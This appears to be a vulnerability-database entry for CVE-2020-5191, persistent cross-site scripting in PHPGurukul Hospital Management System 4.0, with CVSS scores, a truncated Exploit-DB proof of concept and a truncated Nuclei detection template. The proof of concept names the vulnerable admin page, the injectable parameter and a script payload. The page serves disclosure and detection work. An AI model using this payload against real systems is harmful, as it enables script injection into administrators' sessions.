CVE-2020-5191
published 2020-01-06CVE-2020-5191: PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
PriorityP339medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
5.52%
91.8th percentile
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpgurukul | hospital_management_system | — | — |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Hospital Management System 4.0 - Persistent Cross-Site Scripting
exploitdb·2020-01-02·CVSS 6.1
CVE-2020-5191 [MEDIUM] Hospital Management System 4.0 - Persistent Cross-Site Scripting
Hospital Management System 4.0 - Persistent Cross-Site Scripting
---
# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : CVE-2020-5191
================ 1. - Cross Site Scripting (Persistent) ================
URL : http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
Method : POST
Parameter: doctorspecilization
Attack : alert("XSS");
POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: t
Nuclei
PHPGurukul Hospital Management System - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2020-5191 [MEDIUM] PHPGurukul Hospital Management System - Cross-Site Scripting
PHPGurukul Hospital Management System - Cross-Site Scripting
PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
Template:
id: CVE-2020-5191
info:
name: PHPGurukul Hospital Management System - Cross-Site Scripting
author: TenBird
severity: medium
description: |
PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by
No writeups or analysis indexed.
2020-01-06
Published